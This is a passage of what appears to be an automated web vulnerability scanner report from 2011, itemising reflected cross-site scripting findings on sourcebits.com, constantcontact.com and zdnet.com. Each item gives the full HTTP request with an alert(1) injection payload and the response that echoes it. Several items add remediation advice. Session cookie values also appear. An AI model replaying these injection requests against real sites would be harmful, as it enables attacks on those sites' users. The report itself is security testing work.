<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/mobile?8e883<script>alert(1)</script>e396100ca93=1</h2>
...[SNIP]...

1.127. http://www.sourcebits.com/palmpre [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /palmpre

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c29b3<script>alert(1)</script>16978e18f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /palmprec29b3<script>alert(1)</script>16978e18f26 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:56:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/palmprec29b3<script>alert(1)</script>16978e18f26</h2>
...[SNIP]...

1.128. http://www.sourcebits.com/palmpre [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /palmpre

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d73be<script>alert(1)</script>d72abdbf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /palmpre?d73be<script>alert(1)</script>d72abdbf4a2=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/palmpre?d73be<script>alert(1)</script>d72abdbf4a2=1</h2>
...[SNIP]...

1.129. http://www.sourcebits.com/sourcebits.json [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /sourcebits.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d3ca<script>alert(1)</script>7aff0799826 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sourcebits.json7d3ca<script>alert(1)</script>7aff0799826?callback=twitterCallback2&count=10 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:50 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/sourcebits.json7d3ca<script>alert(1)</script>7aff0799826?callback=twitterCallback2&count=10</h2>
...[SNIP]...

1.130. http://www.sourcebits.com/web [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0d44<script>alert(1)</script>59746985c20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weba0d44<script>alert(1)</script>59746985c20 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/weba0d44<script>alert(1)</script>59746985c20</h2>
...[SNIP]...

1.131. http://www.sourcebits.com/web [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /web

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a74e0<script>alert(1)</script>1505dae608c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web?a74e0<script>alert(1)</script>1505dae608c=1 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:23 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/web?a74e0<script>alert(1)</script>1505dae608c=1</h2>
...[SNIP]...

1.132. http://www.constantcontact.com/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69bd0'-alert(1)-'3935c2645ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jsp HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages; cclp_partner="prt_01_ts=21765467|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=cc::CLK_14302119028162790|cc_01_ts=21765467|"; cclp_content="lp_uid=20110520_17:47:29.427_D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages|"; cclp_referral="partner=ROVING|cc=CLK_14302119028162790|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; BIGipServerProdLP=2235962378.20480.0000
Referer: http://www.google.com/search?hl=en&q=69bd0'-alert(1)-'3935c2645ac

Response

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 21:48:03 GMT
Server: Apache
X-Powered-By:
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
ETag: "0592f5f18c1e33e215e5720c86b937831"
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 32766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email Marketi
...[SNIP]...
<![CDATA[
s.pageName='/index.jsp';
s.server='533';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=69bd0'-alert(1)-'3935c2645ac';
s.campaign='CLK_14302119028162790';
s.prop1='';
s.prop2='20110520_17:47:29.427_D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages';
s.prop3='prospect';
s.prop4='ROVING';
s.prop5='';
s.prop6='Websi
...[SNIP]...

1.133. http://www.constantcontact.com/index.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e50'-alert(1)-'cf879ce3d21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jsp?cc=CLK_14302119028162790 HTTP/1.1
Host: www.constantcontact.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=d3e50'-alert(1)-'cf879ce3d21

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 21:48:18 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=FDA51161E6D7A8B3FFCB270515748912.worker_landingPages; Path=/
Set-Cookie: cclp_partner="prt_01_ts=21765468|prt_01=partner.name::NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=cc::googd3e50-alert(1)-cf879ce3d21|cc_01_ts=21765468|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20110520_17:48:18.775_FDA51161E6D7A8B3FFCB270515748912.worker_landingPages|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_nsearch="ns_01_ts=21765468|ns_01=goog::d3e50-alert(1)-cf879ce3d21|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_referral="partner=NATSEARCH|pn=NATSEARCH|cc=googd3e50-alert(1)-cf8|sitereferrer=http://www.google.com/search?hl=en&q=d3e50-alert(1)-cf879ce3d21|partner.name=NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Set-Cookie: cclp_partner="prt_01_ts=21765468|prt_01=partner.name::NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_cc="cc_01=cc::googd3e50-alert(1)-cf879ce3d21|cc_01_ts=21765468|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20110520_17:48:18.775_FDA51161E6D7A8B3FFCB270515748912.worker_landingPages|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_nsearch="ns_01_ts=21765468|ns_01=goog::d3e50-alert(1)-cf879ce3d21|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
Set-Cookie: cclp_referral="partner=NATSEARCH|pn=NATSEARCH|cc=googd3e50-alert(1)-cf8|sitereferrer=http://www.google.com/search?hl=en&q=d3e50-alert(1)-cf879ce3d21|partner.name=NATSEARCH|"; Domain=.constantcontact.com; Expires=Thu, 18-Aug-2011 21:48:18 GMT; Path=/
ETag: "08284ec42a4d26daf78874e695e6563ef"
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerProdLP=2252739594.20480.0000; path=/
Content-Length: 32605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email Marketi
...[SNIP]...
<![CDATA[
s.pageName='/index.jsp';
s.server='534';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=d3e50'-alert(1)-'cf879ce3d21';
s.campaign='googd3e50-alert(1)-cf8';
s.prop1='';
s.prop2='20110520_17:48:18.775_FDA51161E6D7A8B3FFCB270515748912.worker_landingPages';
s.prop3='prospect';
s.prop4='NATSEARCH';
s.prop5='';
s.prop6='W
...[SNIP]...

1.134. https://www.constantcontact.com/evm_fee_schedule.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.constantcontact.com
Path:   /evm_fee_schedule.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c916'-alert(1)-'0477972a2ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /evm_fee_schedule.jsp HTTP/1.1
Host: www.constantcontact.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6c916'-alert(1)-'0477972a2ae
Cookie: BIGipServerProdLP=2219185162.20480.0000; mbox=session#1305929363704-637390#1305931335|PC#1305929363704-637390.17#1313705475|check#true#1305929535; GNA_STATE=0; JSESSIONID=A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages; cclp_content="lp_uid=20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages|"; cclp_partner="prt_01_ts=21765489|prt_01=partner.name::ROVING|"; cclp_referral="partner=ROVING|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; s_cc=true; gpv_p11=/offer/buynow/yourweek/signup.jsp; s_sq=constantcom%3D%2526pid%253D/offer/buynow/yourweek/signup.jsp%2526pidt%253D1%2526oid%253Dhttps%25253A//www.constantcontact.com/evm_fee_schedule.jsp%252523evm_pricing_overlay%2526ot%253DA; __utma=152702054.1621908348.1305929445.1305929445.1305929445.1; __utmb=152702054; __utmc=152702054; __utmz=152702054.1305929445.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; cclp_txn="txn_03=page_view::caro_amex|txn_02=page_view::caro_amex|txn_03_ts=21765490|txn_01=page_view::caro_amex|txn_02_ts=21765490|txn_01_ts=21765490|"

Response

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 22:12:31 GMT
Server: Apache
X-Powered-By:
Cache-Control: max-age=0, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Expires: Fri, 20 May 2011 22:12:31 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 11729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Event Marketi
...[SNIP]...
<![CDATA[
s.pageName='/evm_fee_schedule.jsp';
s.server='532';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=6c916'-alert(1)-'0477972a2ae';
s.campaign='';
s.prop1='';
s.prop2='20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages';
s.prop3='prospect';
s.prop4='ROVING';
s.prop5='';
s.prop6='Website';
s.prop7='';
s.pr
...[SNIP]...

1.135. https://www.constantcontact.com/offer/buynow/yourweek/signup.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.constantcontact.com
Path:   /offer/buynow/yourweek/signup.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd367'-alert(1)-'f5938e241ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /offer/buynow/yourweek/signup.jsp HTTP/1.1
Host: www.constantcontact.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fd367'-alert(1)-'f5938e241ee
Cookie: BIGipServerProdLP=2219185162.20480.0000; mbox=check#true#1305929424|session#1305929363704-637390#1305931224|PC#1305929363704-637390.17#1313705368; GNA_STATE=0; JSESSIONID=A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages; cclp_content="lp_uid=20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages|"; cclp_partner="prt_01_ts=21765489|prt_01=partner.name::ROVING|"; cclp_referral="partner=ROVING|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; s_cc=true; gpv_p11=/index.jsp; s_sq=constantcom%3D%2526pid%253D/index.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A//www.constantcontact.com/txn/set.jsp%25253Fid%25253Dcaro_amex%2526ot%253DA; __utma=152702054.1621908348.1305929445.1305929445.1305929445.1; __utmb=152702054; __utmc=152702054; __utmz=152702054.1305929445.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; cclp_txn="txn_03=page_view::caro_amex|txn_02=page_view::caro_amex|txn_03_ts=21765490|txn_01=page_view::caro_amex|txn_02_ts=21765490|txn_01_ts=21765490|"

Response

HTTP/1.1 200 OK
Date: Fri, 20 May 2011 22:12:26 GMT
Server: Apache
X-Powered-By:
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
ETag: "030130a6d5bb4dffee3d8ae13b0a81828"
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 66670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Buy Now and g
...[SNIP]...
<![CDATA[
s.pageName='/offer/buynow/yourweek/signup.jsp';
s.server='532';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='http://www.google.com/search?hl=en&q=fd367'-alert(1)-'f5938e241ee';
s.campaign='';
s.prop1='';
s.prop2='20110520_18:09:29.334_A3F3E1F600B718C61A4B23592E20EA25.worker_landingPages';
s.prop3='prospect';
s.prop4='ROVING';
s.prop5='';
s.prop6='Website';
s.prop7='';
s.pr
...[SNIP]...

1.136. http://www.zdnet.com/blog/btl [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/btl

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e34"><a>70686ffbfd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/btl HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 89e34"><a>70686ffbfd6

Response

HTTP/1.1 200 OK
Date: Sat, 21 May 2011 12:36:27 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Sun, 20-May-2012 12:36:27 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 99907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
adlog/i/r=9953&amp;sg=1815&amp;o=6037%253A10532%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2001&amp;nd=10532&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=00c17-ad-e3:4DD74246598B28&amp;orh=89e34"><a>70686ffbfd6&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=89e34">
...[SNIP]...

1.137. http://www.nytimes.com/recommendations/svc/personalized.json [RMID cookie]

Summary

